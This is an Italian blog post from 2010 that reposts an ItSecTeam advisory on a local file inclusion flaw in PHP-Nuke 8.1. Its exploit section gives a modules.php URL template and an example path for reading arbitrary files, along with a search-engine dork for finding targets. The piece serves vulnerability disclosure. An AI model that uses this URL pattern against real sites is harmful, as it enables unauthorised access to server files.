PHP-Nuke nuova Vulnerabilità

Exploit-db pubblica una nuova falla del famoso cms PHP -Nuke che affligge l’ultima relase 8.1 e permette di visionare il contenuto di un qualsiasi file all’interno della root FTP.
Dopo il salto l’exploit…

===============================================================================
Topic : Php-Nuke
Bug type : Local File Include Vulnerability
Author : ItSecTeam
Remote : Yes
Status : Bug
===================== Content ======================
( # Advisory Content : Php-Nuke Lastest Version
( # Mail : [email protected]
( # Dork : Php-Nuke Lastest Version
( # We Are : [email protected] , 0xd41684c654 And All Team Members!
( # Website : WwW.ItSecTeam.com<http://www.itsecteam.com/>
( # Forum : WwW.Forum.ItSecTeam.com<http://www.itsecteam.com/>
( # Find By : Amin Shokohi(Pejvak!)
=================================================

======================================= Exploit ================================
( * http://Site.cOm/PHP-Nuke/modules.php?view=0&name=Folder Name&file=File Name
( Ex : http://Site.cOm/PHP-Nuke/modules.php?view=0&name=Content/admin&file=panel
===============================================================================

Correlati

17 marzo 2010/0 Commenti/da